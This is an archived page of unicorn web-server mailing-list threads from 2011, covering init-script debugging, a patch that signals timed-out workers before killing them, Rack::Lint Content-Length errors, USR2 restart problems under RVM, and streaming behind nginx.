> http://rubyforge.org/mailman/listinfo/mongrel-unicorn
> Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 0%]

* nginx + unicorn deployment survey
@ 2011-11-14 21:56  4% Eric Wong
  2011-11-15  2:00  0% ` Jason Su
                   ` (2 more replies)
  0 siblings, 3 replies; 200+ results
From: Eric Wong @ 2011-11-14 21:56 UTC (permalink / raw)
  To: unicorn list

Hello all, I'm wondering if you deploy nginx:

1) on the same machine that runs unicorn (exclusively proxying to that)

2) on a different machine that doesn't run unicorn

3) both, nginx could forward to either to localhost
   or another host on the same LAN

And of course, the reason(s) you chose what you chose.  I'm inclined
to believe many folks are on 1) simply because they only have one
machine.

Thanks in advance for your replies, I'm always interested in
hearing user experiences with unicorn.

^ permalink raw reply	[relevance 4%]

* Re: help with an init script
  @ 2011-11-10 11:20  4% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2011-11-10 11:20 UTC (permalink / raw)
  To: unicorn list

Xavier Noria <fxn@hashref.com> wrote:
> Hey, I have this pretty standard init script for Unicorn
> 
>    http://pastie.org/2840779
> 
> where
> 
>    fxn@cohen:~$ ls -la /etc/init.d/unicorn_home
>    lrwxrwxrwx 1 root root 32 2011-11-09 23:45 /etc/init.d/unicorn_home
> -> /home/fxn/home/config/unicorn.sh
> 
>    fxn@cohen:~$ ls -la $HOME/.rvm/bin/ruby
>    -rwxrwxr-x 1 fxn sudo 265 2011-11-09 21:44 /home/fxn/.rvm/bin/ruby
> 
> and $APP_ROOT/bin/unicorn_rails is a binstub created by bundler.

Is /home mounted later in the boot process than when the
unicorn init script fires?  unicorn should be one of the last things
to start if you're putting it in init.

> The init script works like a charm if I run it with sudo, but for some
> reason the service is not launched if the machine is rebooted.
> 
> Do you know what could happen or how could I debug it? dmesg | grep
> unicorn prints nothing.

You could put the following near the top of the init script
(after "set -e"):

	# make sure the directory for this file is something that persists
	# throughout the boot process (isn't mounted-over by another dir):
	ERR=/var/tmp/unicorn.init.err
	rm -f "$ERR"
	exec 2>> "$ERR"

	# ... rest of the script

All stderr output (before unicorn is started) will then go to whatever
you set ERR to.  If you got all the way to starting unicorn:
does the stderr log of unicorn have anything interesting? (please
configure stderr_path if you haven't already)

You can also add "set -x" to the init script and things will get
very verbose once you set it.

Can't think of much else on my sleep-deprived brain...

^ permalink raw reply	[relevance 4%]

* Re: Sending ABRT to timeout-errant process before KILL
  2011-09-08  9:04  1% Sending ABRT to timeout-errant process before KILL J. Austin Hughey
@ 2011-09-08 19:13  5% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2011-09-08 19:13 UTC (permalink / raw)
  To: unicorn list; +Cc: J. Austin Hughey

"J. Austin Hughey" <jhughey@engineyard.com> wrote:
> The general idea is that I'd like to have some way to "warn" the
> application when it's about to be killed.  I've patched
> murder_lazy_workers to send an abort signal via kill_worker, sleep for
> 5 seconds, then look and see if the process still exists by using
> Process.getpgid.  If so, it sends the original kill command, and if
> not, a rescue block kicks in to prevent the raised error from
> Process.getpgid from making things explode.

The problem with anything other than SIGKILL (or SIGSTOP) is that it
assumes the Ruby VM is working and in a good state.

> I've created a simulation app, built on Rails 3.0, that uses a generic
> "posts" controller to simulate a long-running request.  Instead of
> just throwing a straight-up sleep 65 in there, I have it running
> through sleeping 1 second on a decrementing counter, and doing that 65
> times.  The reason is because, assuming I've read the code correctly,
> even with my "skip sleeping workers" commented line below, it'll skip
> over the process, thus rendering my simulation of a long-running
> process invalid.  However, clarification on this point is certainly
> welcome.  You can see the app here:
> https://github.com/jaustinhughey/unicorn_test/blob/master/app/controllers/posts_controller.rb

(purely for educational purposes, since I'll point you towards another
approach I believe is better)

              Signal.trap(:ABRT) do
                # Write some stuff to the Rails log
                logger.info "Caught Unicorn kill exception!"

If this is the logger that ships with Ruby, it locks a Mutex, so it'll
deadlock if another SIGABRT is received while logging the above
statement (a very small window, admittedly).

                # Do a controlled disconnect from ActiveRecord
                ActiveRecord::Base.connection.disconnect!

Likewise, if AR needs to lock internal structures before disconnecting,
it also must be reentrant.  Ruby's normal Mutex implementation is not
reentrant-safe.


> So it looks like Worker 1 is hitting a strange/false timeout of
> 1315467289 seconds, which isn't really possible as it wasn't even
> running 1315467289 seconds prior to that (which equates to roughly 41
> years ago if my math is right).

You're getting this because you removed the following line:

      0 == tick and next # skip workers that are sleeping

"Sleeping" means the worker hasn't accepted a client connection yet,
not that it's sleeping while processing a client request.  I'll clarify
that in the code.
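That also explains the bogus 1315467289s figure in the log: with the skip removed, a sleeping worker has tick == 0, so the computed "age" is simply the current Unix timestamp:

```ruby
now  = Time.now.to_i # e.g. 1315467289 back in September 2011
tick = 0             # a worker that hasn't accepted a connection yet
diff = now - tick    # == now itself, i.e. ~41 years' worth of seconds
puts "timeout (#{diff}s > 60s)" # matches the log line in the report
```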

> Needless to say, I'm a bit stumped at this point, and would sincerely
> appreciate another point of view on this.  Am I going about this all
> wrong?  Is there a better approach I should consider?  And if I'm on
> the right track, how can I get this to work regardless of how many
> Unicorn workers are running?

Since it's an application error, it can be done as middleware.  You can
try something like the Rainbows::ThreadTimeout middleware, it's
currently Rainbows! specific but can easily be made to work with
Unicorn.

	git clone git://bogomips.org/rainbows
	cat rainbows/lib/rainbows/thread_timeout.rb

This is conceptually similar to "timeout" in the Ruby standard library,
but does not allow nesting.
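A rough sketch of that idea (illustrative only, not the actual Rainbows::ThreadTimeout source; `AppTimeout` and `RequestExpired` are names made up for this sketch): a watchdog thread raises into the request thread if the app runs too long.  As with the stdlib timeout, raising asynchronously is unsafe if the app holds locks, so treat it as a last resort:

```ruby
# Minimal thread-based request timeout as Rack middleware (concept sketch).
class AppTimeout
  class RequestExpired < RuntimeError; end

  def initialize(app, seconds)
    @app, @seconds = app, seconds
  end

  def call(env)
    me = Thread.current
    watchdog = Thread.new do
      sleep(@seconds)
      me.raise(RequestExpired, "request ran longer than #{@seconds}s")
    end
    begin
      @app.call(env)
    ensure
      watchdog.kill # small race: the raise may land just after the app returns
    end
  end
end

# usage in config.ru:
#   use AppTimeout, 60
#   run MyApp
```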

I'll try to clarify more later today if you have questions, in a bit of
a rush right now.

-- 
Eric Wong


^ permalink raw reply	[relevance 5%]

* Sending ABRT to timeout-errant process before KILL
@ 2011-09-08  9:04  1% J. Austin Hughey
  2011-09-08 19:13  5% ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: J. Austin Hughey @ 2011-09-08  9:04 UTC (permalink / raw)
  To: mongrel-unicorn

Hello there -

I've recently been working with a customer in my capacity as a support engineer at Engine Yard who's having some trouble with Unicorn.  Basically, they're finding their application being force-killed once it reaches the default timeout.  Rather than simply increasing the timeout, we're trying to find out _why_ their application is being killed.  Unfortunately we can't quite do that because the application is being force-killed without warning, making it so that the customer's logging can't actually be written to the disk. (This is an intermittent issue as opposed to something that happens 100% of the time.)

In discussing the matter internally and with our customer, I came up with a simple monkey patch to Unicorn that _sort of_ works, but I'm having some trouble with it once the number of Unicorn workers goes beyond one.  I originally limited it to just one worker because I wanted to limit the possibility that multiple workers could cause problems in figuring things out -- turns out I was right.

I'm going to show the patch in two ways: 1) inline, at the bottom of this post, and 2) by link to GitHub:
https://github.com/jaustinhughey/unicorn/blob/abort_prior_to_kill_workers/lib/unicorn/http_server.rb#L438

The general idea is that I'd like to have some way to "warn" the application when it's about to be killed.  I've patched murder_lazy_workers to send an abort signal via kill_worker, sleep for 5 seconds, then look and see if the process still exists by using Process.getpgid.  If so, it sends the original kill command, and if not, a rescue block kicks in to prevent the raised error from Process.getpgid from making things explode.

I've created a simulation app, built on Rails 3.0, that uses a generic "posts" controller to simulate a long-running request.  Instead of just throwing a straight-up sleep 65 in there, I have it running through sleeping 1 second on a decrementing counter, and doing that 65 times.  The reason is because, assuming I've read the code correctly, even with my "skip sleeping workers" commented line below, it'll skip over the process, thus rendering my simulation of a long-running process invalid.  However, clarification on this point is certainly welcome.  You can see the app here: https://github.com/jaustinhughey/unicorn_test/blob/master/app/controllers/posts_controller.rb

The problem I'm running into, and where I could use some help, is when I increase the number of Unicorn workers from one to two.  When running only one Unicorn worker, I can access my application's posts_controller's index action, which has the intentionally long-running code.  At that time I tail -f unicorn.log and production.log.  Those two logs look like this with one Unicorn worker:

WITH ONE UNICORN WORKER:
========================

production.log:
---------------
Sleeping 1 second (65 to go)…
 ... continued ...
Sleeping 1 second (7 to go)...
Sleeping 1 second (6 to go)...
Sleeping 1 second (5 to go)...
Caught Unicorn kill exception!
Sleeping 1 second (4 to go)...
Sleeping 1 second (3 to go)...
Sleeping 1 second (2 to go)...
Sleeping 1 second (1 to go)...
Completed 500 Internal Server Error in 65131ms

NoMethodError (undefined method `query_options' for nil:NilClass):
  app/controllers/posts_controller.rb:32:in `index'

(I think the NoMethodError issue above is due to me calling a disconnect on ActiveRecord in the Signal.trap block, so I think that can be safely ignored.)

As you can see, the Signal.trap block inside the aforementioned posts_controller is working in this case.  Corresponding log entries in unicorn.log concur:

unicorn.log:
------------
worker=0 ready
master process ready
[2011-09-08 00:31:01 PDT] worker=0 PID: 28921 timeout hit, sending ABRT to process 28921 then sleeping 5 seconds...
[2011-09-08 00:31:06 PDT] worker=0 PID:28921 timeout (61s > 60s), killing
reaped #<Process::Status: pid 28921 SIGKILL (signal 9)> worker=0
worker=0 ready

So with one worker, everything seems cool.  But with two workers?


WITH TWO UNICORN WORKERS:
=========================

production.log:
---------------
Sleeping 1 second (8 to go)...
Sleeping 1 second (7 to go)...
Sleeping 1 second (6 to go)...
Sleeping 1 second (5 to go)...
Sleeping 1 second (4 to go)...
Sleeping 1 second (3 to go)...
Sleeping 1 second (2 to go)...
Sleeping 1 second (1 to go)...
Rendered posts/index.html.erb within layouts/application (13.2ms)
Completed 200 OK in 65311ms (Views: 16.9ms | ActiveRecord: 0.5ms)

Note that there is no notice that the ABRT signal was trapped, nor is there a NoMethodError (likely caused by disconnecting from the database) as above.  Odd.

unicorn.log:
------------
Nothing.  No new data whatsoever.

The only potential clue I can see at this point would be a start-up message in unicorn.log.  After increasing the number of Unicorn workers to two, I examined unicorn.log again and found this:

master complete
I, [2011-09-08T00:34:40.499437 #29572]  INFO -- : unlinking existing socket=/var/run/engineyard/unicorn_ut.sock
I, [2011-09-08T00:34:40.499888 #29572]  INFO -- : listening on addr=/var/run/engineyard/unicorn_ut.sock fd=5
I, [2011-09-08T00:34:40.504542 #29572]  INFO -- : Refreshing Gem list
worker=0 ready
master process ready
[2011-09-08 00:34:49 PDT] worker=1 PID: 29582 timeout hit, sending ABRT to process 29582 then sleeping 5 seconds...
[2011-09-08 00:34:50 PDT] worker=1 PID:29582 timeout (1315467289s > 60s), killing
reaped #<Process::Status: pid 29582 SIGIOT (signal 6)> worker=1
worker=1 ready

So it looks like Worker 1 is hitting a strange/false timeout of 1315467289 seconds, which isn't really possible as it wasn't even running 1315467289 seconds prior to that (which equates to roughly 41 years ago if my math is right).

---

Needless to say, I'm a bit stumped at this point, and would sincerely appreciate another point of view on this.  Am I going about this all wrong?  Is there a better approach I should consider?  And if I'm on the right track, how can I get this to work regardless of how many Unicorn workers are running?

Thank you very much for any assistance you can provide!


-- INLINE VERSION OF PATCH --

diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index 78d80b4..8a2323f 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -429,6 +429,11 @@ class Unicorn::HttpServer
     proc_name 'master (old)'
   end
 
+  # A custom formatted timestamp for debugging
+  def custom_timestamp
+    return Time.now.strftime("[%Y-%m-%d %T %Z]")
+  end
+
   # forcibly terminate all workers that haven't checked in in timeout seconds.  The timeout is implemented using an unlinked File
   def murder_lazy_workers
     t = @timeout
@@ -436,16 +441,40 @@ class Unicorn::HttpServer
     now = Time.now.to_i
     WORKERS.dup.each_pair do |wpid, worker|
       tick = worker.tick
-      0 == tick and next # skip workers that are sleeping
+
+      # REMOVE THE FOLLOWING COMMENT WHEN TESTING PRODUCTION
+# 0 == tick and next # skip workers that are sleeping
+      # ^ needs to be active, commented here for simulation purposes
+
       diff = now - tick
       tmp = t - diff
       if tmp >= 0
         next_sleep < tmp and next_sleep = tmp
         next
       end
-      logger.error "worker=#{worker.nr} PID:#{wpid} timeout " \
-                   "(#{diff}s > #{t}s), killing"
-      kill_worker(:KILL, wpid) # take no prisoners for timeout violations
+
+
+      # Send an ABRT signal to Unicorn and wait 5 seconds before attempting an
+      # actual kill, if and only if the process is still running.
+
+      begin
+        # Send the ABRT signal.
+        logger.debug "#{custom_timestamp} worker=#{worker.nr} PID: #{wpid} timeout hit, sending ABRT to process #{wpid} then sleeping 5 seconds..."
+        kill_worker(:ABRT, wpid)
+
+        sleep 5
+
+        # Now see if the process still exists after being given five
+        # seconds to terminate on its own, and if so, do a hard kill.
+        if Process.getpgid(wpid)
+          logger.error "#{custom_timestamp} worker=#{worker.nr} PID:#{wpid} timeout " \
+                       "(#{diff}s > #{@timeout}s), killing"
+          kill_worker(:KILL, wpid) # take no prisoners for timeout violations
+        end
+      rescue Errno::ESRCH => e
+        # No process identified - maybe it exited on its own?
+        logger.debug "#{custom_timestamp} worker=#{worker.nr} PID: #{wpid} responded to ABRT on its own and no longer exists. (Received message: #{e})"
+      end
     end
     next_sleep
   end

-- END INLINE VERSION OF PATCH --

--
J. Austin Hughey
Application Support Engineer - Engine Yard
www.engineyard.com | jhughey@engineyard.com



^ permalink raw reply related	[relevance 1%]

* Re: Strange quit behavior
  @ 2011-08-23 16:49  4%                     ` Alex Sharp
  0 siblings, 0 replies; 200+ results
From: Alex Sharp @ 2011-08-23 16:49 UTC (permalink / raw)
  To: unicorn list

On Tuesday, August 23, 2011 at 12:12 AM, Eric Wong wrote:
> Did you send any signals to 18862 while you were making this strace?
Not while, no. I had already sent a USR2 signal to this process (the old master), and then I attached strace to it. 

I'll try sending another USR2 signal next time while strace is attached. 
> >  I went ahead and ran strace with the same flags on the *new* master,
> > and saw a bunch of output that looked bundler-related:
> > https://gist.github.com/138344b5b19ec6ba1a4c
> > 
> > Even more bizarre, eventually the process started successfully :-/ Is
> > it possible this had something to do with strace de-taching?
> 
> That looks like pretty normal "require" behavior. strace would slow
>  down requires, a lot.
> 
> So this was with preload_app=true? While you're debugging problems,
> I suggest keeping preload_app=false and worker_problems=1 to minimize
> the variables.
Ok, I'll change those and report back. I'm guessing you meant worker_processes (not problems)? 
> 
> > You can see this in the unicorn.stderr.log file I included in the
> > gist. Check out these two lines in particular, which occur 25 minutes
> >  apart:
> > 
> > I, [2011-08-23T02:15:08.396868 #22169] INFO -- : Refreshing Gem list
> > I, [2011-08-23T02:40:16.621210 #22925] INFO -- : worker=1 spawned pid=22925
> 
> Wow, it takes 25 minutes to load your application? strace makes the
>  application /much/ slower, so I can actually believe it takes that long.
No, my mistake. Loading the application only takes about 10 seconds, and I only had strace attached to this process for a few seconds (less than 10). My point here was to show that the new master just spun for a good 25 minutes (presumably trying to load files over and over again), and then, seemingly out of nowhere, the new master came up and spawned the new workers. 
Next time I'll try to get attached with strace earlier and record more output.

> 
>  Loading large applications is very slow under Ruby 1.9.2, there's some
> pathological load performance issues fixed in 1.9.3.
> 
Yep, I've read about those, and I've seen Xavier's patch, but I don't think that's the issue here (though, it appears that's why the files attempting to be loaded in the strace output do not exist). Under normal circumstances, loading the app takes about 10 seconds and doesn't peg the CPU while doing it.
> 
> So you're saying /without/ strace, CPU usage _stays_ at 100% and _never_
> goes down?
Correct. 
> 
> 
> Generally, can you reproduce this behavior on a plain (empty) Rails
>  application with no extra gems?
> 
Good idea, I'll try that next.

- Alex 


^ permalink raw reply	[relevance 4%]

* Re: Rack content-length Rack::Lint::LintErrors errors with unicorn
  @ 2011-08-12 19:22  3%     ` Joe Van Dyk
  0 siblings, 0 replies; 200+ results
From: Joe Van Dyk @ 2011-08-12 19:22 UTC (permalink / raw)
  To: unicorn list

On Fri, Aug 12, 2011 at 11:09 AM, Joe Van Dyk <joe@tanga.com> wrote:
> On Thu, Aug 11, 2011 at 10:42 PM, Eric Wong <normalperson@yhbt.net> wrote:
>> Joe Van Dyk <joe@tanga.com> wrote:
>>> Has anyone seen anything like this before?  I can get it to happen all
>>> the time if I issue a HEAD request, but it only happens very
>>> intermittently on GET requests.
>>>
>>> I'm using Ruby 1.9.2p180.
>>>
>>> Any ideas on where to start debugging?
>>
>> What web framework and other middlewares are you running?  Are you using Rack::Head to
>> generate HEAD responses or something else?
>
> Rails 3.0.  I'm not doing anything special with HEAD requests.  I
> actually don't care about the HEAD requests -- you'll note that I'm
> doing a GET request below.  The Content-Length is 37902 (which is
> should be), but apparently there's nothing in the response body?


Here's another example: the body is apparently empty, but the
Content-Length is set on a 302 response.  Unfortunately, I can't
reproduce the problem consistently.  :(  I'd expect the body to not be
empty here.

216.14.95.14, 10.195.114.81 - - [12/Aug/2011 12:00:46] "GET
/deals/current/good_till_gone HTTP/1.0" 302 195 0.0148
app error: Content-Length header was 195, but should be 0
(Rack::Lint::LintError)
/mnt/data/tanga/current/bundler/ruby/1.9.1/gems/rack-1.2.3/lib/rack/lint.rb:19:in
`assert'
/mnt/data/tanga/current/bundler/ruby/1.9.1/gems/rack-1.2.3/lib/rack/lint.rb:501:in
`verify_content_length'
/mnt/data/tanga/current/bundler/ruby/1.9.1/gems/rack-1.2.3/lib/rack/lint.rb:525:in
`each'
/mnt/data/tanga/current/bundler/ruby/1.9.1/gems/unicorn-4.0.1/lib/unicorn/http_response.rb:41:in
`http_response_write'
/mnt/data/tanga/current/bundler/ruby/1.9.1/gems/unicorn-4.0.1/lib/unicorn/http_server.rb:526:in
`process_client'
/mnt/data/tanga/current/bundler/ruby/1.9.1/gems/unicorn-4.0.1/lib/unicorn/http_server.rb:585:in
`worker_loop'
/mnt/data/tanga/current/bundler/ruby/1.9.1/gems/newrelic_rpm-3.0.1/lib/new_relic/agent/instrumentation/unicorn_instrumentation.rb:12:in
`call'
/mnt/data/tanga/current/bundler/ruby/1.9.1/gems/newrelic_rpm-3.0.1/lib/new_relic/agent/instrumentation/unicorn_instrumentation.rb:12:in
`block (4 levels) in <top (required)>'
/mnt/data/tanga/current/bundler/ruby/1.9.1/gems/unicorn-4.0.1/lib/unicorn/http_server.rb:475:in
`spawn_missing_workers'
/mnt/data/tanga/current/bundler/ruby/1.9.1/gems/unicorn-4.0.1/lib/unicorn/http_server.rb:135:in
`start'
/mnt/data/tanga/current/bundler/ruby/1.9.1/gems/unicorn-4.0.1/bin/unicorn:121:in
`<top (required)>'
/data/tanga/current/sites/tanga/bin/unicorn:16:in `load'
/data/tanga/current/sites/tanga/bin/unicorn:16:in `<main>'


>
>>> 204.93.223.151, 10.195.114.81 - - [11/Aug/2011 21:03:50] "GET /
>>> HTTP/1.0" 200 37902 0.5316
>>> app error: Content-Length header was 37902, but should be 0
>>> (Rack::Lint::LintError)
>>> /mnt/data/tanga/current/bundler/ruby/1.9.1/gems/rack-1.2.3/lib/rack/lint.rb:19:in
>>> `assert'
>>> /mnt/data/tanga/current/bundler/ruby/1.9.1/gems/rack-1.2.3/lib/rack/lint.rb:501:in
>>> `verify_content_length'
>>
>> Looking at the 1.2.3 rack/lint.rb code, it should've set @head_request to true
>> when env["REQUEST_METHOD"] == "HEAD" (rack/lint.rb line 56).
>> Do you happen to have any middlewares that might rewrite REQUEST_METHOD?
>>
>> I would edit rack/lint.rb and put some print statements to show the
>> value of @head_request and env["REQUEST_METHOD"]
>>
>> --
>> Eric Wong
>>
>


* Re: Strange quit behavior
  @ 2011-08-02 23:49  4%       ` Alex Sharp
  0 siblings, 0 replies; 200+ results
From: Alex Sharp @ 2011-08-02 23:49 UTC (permalink / raw)
  To: unicorn list; +Cc: James Cox

On Tue, Aug 2, 2011 at 4:08 PM, Eric Wong <normalperson@yhbt.net> wrote:
> James Cox <james@imaj.es> wrote:
>> So what should that look like? all but that nr-workers stuff? can i
>> just remove the before fork? and what would you say is a super good
>> unicorn config to start from?
>
> Yeah, skip the before_fork and also after_fork.  Those are mainly for
> disconnect/reconnect of ActiveRecord and anything else that might need a
> network connection.

FWIW, we use the before_fork hook to automatically kill the old master
by sending it QUIT:

before_fork do |server, worker|
  old_pid = '/var/www/api/shared/pids/unicorn.pid.oldbin'

  if File.exists?(old_pid) && server.pid != old_pid
    begin
      Process.kill("QUIT", File.read(old_pid).to_i)
    rescue Errno::ENOENT, Errno::ESRCH
      # another newly forked worker has already killed it
    end
  end
end

- alex



* Re: SIGTERM not actually killing processes
       [not found]         ` <CAFgS5CxwCmHL65W39R2W73YfUK34WX50DS_JJF4L-d_tQuH86Q@mail.gmail.com>
@ 2011-07-25 23:20  0%       ` Jesse Cooke
  0 siblings, 0 replies; 200+ results
From: Jesse Cooke @ 2011-07-25 23:20 UTC (permalink / raw)
  To: unicorn list

Sending TERM directly to the master process killed it.

--------------------------------------------
Jesse Cooke :: N-tier Engineer
jc00ke.com / @jc00ke


On Mon, Jul 25, 2011 at 3:30 PM, Jesse Cooke <jesse@jc00ke.com> wrote:
>
> Sending TERM directly to the master process killed it.
>
> --------------------------------------------
> Jesse Cooke :: N-tier Engineer
> jc00ke.com / @jc00ke
>
>
> On Mon, Jul 25, 2011 at 2:32 PM, Alex Sharp <ajsharp@gmail.com> wrote:
>>
>> On Monday, July 25, 2011 at 2:22 PM, Eric Wong wrote:
>>
>> Jesse Cooke <jesse@jc00ke.com> wrote:
>>
>> Hi,
>> Unicorn is saying it's terminating but it's not actually. Check out
>> the gist: https://gist.github.com/1104930
>>
>> Using:
>> - Ruby 1.9.2p180
>> - unicorn 4.0.1
>> - kgio 2.6.0
>> - bundler 1.0.15
>> - Linux maynard 2.6.38-10-generic #46-Ubuntu SMP Tue Jun 28 15:07:17
>> UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
>>
>> Please let me know if there's any other info I can provide.
>>
>> Since it's a 2.6.38 kernel, it could be this bug:
>> https://bugzilla.kernel.org/show_bug.cgi?id=32922
>>
>> Linux 2.6.38.4 should have the fix, but I'm not sure if Ubuntu
>> backported that fix to its 2.6.38-10 package.
>>
>> Rubyists have seen this issue a few times already:
>> http://redmine.ruby-lang.org/issues/4777
>> http://redmine.ruby-lang.org/issues/4939
>>
>>
>> Also, can you try sending signals directly to Unicorn without foreman?
>> I'm not familiar with foreman at all, maybe somebody else on this list
>> is...
>>
>> Not familiar with foreman, but I've verified the issues you've linked
>> to with another non-unicorn problem (god, actually). As of a couple of
>> weeks ago, the kernel bug still existed in ubuntu 11.04, and to my
>> knowledge, this is the only affected major version. We're in the
>> process of moving to ubuntu 10.10 (mostly because of this bug), which
>> is the most recent LTS release, and not affected by the signal
>> trapping bug.
>>
>> --
>> Eric Wong
>>
>



* Re: Unicorn completely ignores USR2 signal
  2011-07-06 17:42  0% ` Eric Wong
@ 2011-07-07 23:02  0%   ` Ehud Rosenberg
  0 siblings, 0 replies; 200+ results
From: Ehud Rosenberg @ 2011-07-07 23:02 UTC (permalink / raw)
  To: mongrel-unicorn

Eric Wong <normalperson <at> yhbt.net> writes:

> 
> Ehud Rosenberg <ehudros <at> gmail.com> wrote:
> > Hi all,
> > I'm experiencing a rather strange problem with unicorn on my production 
server.
> > Although the config file states preload_app true, sending USR2 to the
> > master process does not generate any response, and it seems like
> > unicorn is ignoring the signal altogether.
> > On another server sending USR2 changes the master process to an (old)
> > state and starts a new master process successfully.
> > The problematic server is using RVM & bundler, so I'm assuming it's
> > somehow related (the other one is vanilla ruby).
> 
> RVM could be a problem, especially if your ENV changed somehow and your
> path too.  Can you dump out the START_CTX and ENV contents in the
> before_exec hook?
> 
>   before_exec do |server|
>     File.open("/tmp/start_ctx.dump", "ab") do |fp|
>       PP.pp Unicorn::HttpServer::START_CTX, fp
>       PP.pp ENV, fp
>     end
>   end
> 
> You may need to modify START_CTX if you're changing paths or if
> somehow RVM gave you the wrong path to unicorn
> 
> START_CTX is documented here:
>   http://unicorn.bogomips.org/Unicorn/HttpServer.html
> 
> > Sending signals other than USR2 (QUIT, HUP) works just fine.
> > Is there a way to trace what's going on behind the scenes here?
> 
> Run strace (Linux) or equivalent on the master process.
> 
> > Unicorn's log file is completely empty.
> 
> This is the log you setup to point to stderr_path?  That shouldn't
> happen...
> 

Sorry for not getting back to you guys earlier. 
It seems like the entire setup is somehow broken, as the before_exec block does 
not seem to output anything to the logfiles/temp file (I know how weird that 
sounds). The stdout/stderr logs do not contain any info other than the regular 
"worker started" message.
I've tried 'puts' outside of the before_exec block and got the following output 
straight into my stdout (right after running sudo /etc/init.d/unicorn start):
{:argv=>["-D", "-E", "production", "-c", 
"/var/www/platform/current/config/unicorn.rb"], 0=>"/usr/local/rvm/gems/ruby-
1.9.2-head/bin/unicorn", :cwd=>"/var/www/platform/current"}

{"OLDPWD"=>"/var/www/platform/current", "SUDO_UID"=>"1000", "LOGNAME"=>"root", 
"USERNAME"=>"root", "PATH"=>"/usr/local/rvm/gems/ruby-1.9.2-
head/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/X11R6
/bin", "SHELL"=>"/bin/bash", "GEM_HOME"=>"/usr/local/rvm/gems/ruby-1.9.2-head",  
"PWD"=>"/var/www/platform/current", "RACK_ENV"=>"production", 
"BUNDLE_GEMFILE"=>"/var/www/platform/current/Gemfile", 
"BUNDLE_BIN_PATH"=>"/usr/local/rvm/gems/ruby-1.9.2-head/gems/bundler-
1.0.10/bin/bundle", "RUBYOPT"=>"-I/usr/local/rvm/gems/ruby-1.9.2-
head/gems/bundler-1.0.10/lib -rbundler/setup"}

The ENV output was truncated a little to remove irrelevant keys.

strace can be found here: 
https://gist.github.com/54cd784880b99a2b46d5/77718daec3c08227639a0619e02d387c4d0
cd9fd
I couldn't really figure out what's going on there - it complains the pid file 
can't be found although it's there, and it then writes its content to the oldbin 
file (which is never actually created in the pid directory). Permissions-wise 
the directory is writable by pretty much anyone, and unicorn runs as root 
anyway.

The server is Ubuntu 10.04, ruby 1.9.2p53.
The server starts fine and the site is fully functional despite all the 
weirdness :)






* Re: Unicorn completely ignores USR2 signal
  2011-07-06 10:21  4% Unicorn completely ignores USR2 signal Ehud Rosenberg
@ 2011-07-06 17:42  0% ` Eric Wong
  2011-07-07 23:02  0%   ` Ehud Rosenberg
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2011-07-06 17:42 UTC (permalink / raw)
  To: unicorn list

Ehud Rosenberg <ehudros@gmail.com> wrote:
> Hi all,
> I'm experiencing a rather strange problem with unicorn on my production server.
> Although the config file states preload_app true, sending USR2 to the
> master process does not generate any response, and it seems like
> unicorn is ignoring the signal altogether.
> On another server sending USR2 changes the master process to an (old)
> state and starts a new master process successfully.
> The problematic server is using RVM & bundler, so I'm assuming it's
> somehow related (the other one is vanilla ruby).

RVM could be a problem, especially if your ENV changed somehow and your
path too.  Can you dump out the START_CTX and ENV contents in the
before_exec hook?

  require "pp" # PP is not loaded by default
  before_exec do |server|
    File.open("/tmp/start_ctx.dump", "ab") do |fp|
      PP.pp Unicorn::HttpServer::START_CTX, fp
      PP.pp ENV, fp
    end
  end

You may need to modify START_CTX if you're changing paths or if
somehow RVM gave you the wrong path to unicorn.

START_CTX is documented here:
  http://unicorn.bogomips.org/Unicorn/HttpServer.html

> Sending signals other than USR2 (QUIT, HUP) works just fine.
> Is there a way to trace what's going on behind the scenes here?

Run strace (Linux) or equivalent on the master process.

> Unicorn's log file is completely empty.

This is the log you setup to point to stderr_path?  That shouldn't
happen...

-- 
Eric Wong



* Unicorn completely ignores USR2 signal
@ 2011-07-06 10:21  4% Ehud Rosenberg
  2011-07-06 17:42  0% ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Ehud Rosenberg @ 2011-07-06 10:21 UTC (permalink / raw)
  To: mongrel-unicorn

Hi all,
I'm experiencing a rather strange problem with unicorn on my production server.
Although the config file states preload_app true, sending USR2 to the
master process does not generate any response, and it seems like
unicorn is ignoring the signal altogether.
On another server sending USR2 changes the master process to an (old)
state and starts a new master process successfully.
The problematic server is using RVM & bundler, so I'm assuming it's
somehow related (the other one is vanilla ruby).
Sending signals other than USR2 (QUIT, HUP) works just fine.
Is there a way to trace what's going on behind the scenes here?
Unicorn's log file is completely empty.
Thanks :)



* Re: Unicorn and streaming in Rails 3.1
  2011-06-25 20:16  5% ` Eric Wong
@ 2011-06-25 22:23  0%   ` Xavier Noria
  0 siblings, 0 replies; 200+ results
From: Xavier Noria @ 2011-06-25 22:23 UTC (permalink / raw)
  To: unicorn list

On Sat, Jun 25, 2011 at 10:16 PM, Eric Wong <normalperson@yhbt.net> wrote:

> Basically the per-connection overhead of Unicorn is huge, an entire Ruby
> process (tens to several hundreds of megabytes).  The per-connection
> overhead of nginx is tiny: maybe a few KB in userspace (including
> buffers), and a few KB in the kernel.  You don't want to maintain
> connections to Unicorn for a long time because of that cost.

I see. I've read also the docs about design and philosophy in the website.

So if I understand it correctly, as far as memory consumption is
concerned the situation seems to be similar to the old days when
mongrel cluster was the standard for production, except perhaps for
setups with copy-on-write friendly interpreters, which weren't
available then.

So you configure only a few processes because of memory consumption,
and since there aren't many you want them to be ready to serve a new
request as soon as possible to handle some normal level of
concurrency. Hence the convenience of buffering in Nginx.

>> in the use case we have in mind in
>> Rails 3.1, which is to serve HEAD as soon as possible.
>
> Small nit: s/HEAD/the response header/   "HEAD" is a /request/ that only
> expects to receive the response header.

Oh yes, that was ambiguous. I actually meant the HEAD element of HTML
documents. The main use case in mind for adding streaming to Rails is
to be able to send the top of your layout (typically everything before
yielding to the view) so that the browser may issue requests for CSS
and JavaScript assets while the application builds a hypothetically
costly dynamic response.

> nginx only sends HTTP/1.0 requests to unicorn, so Rack::Chunked won't
> actually send a chunked/streamed response.  Rails 3.1 /could/ enable
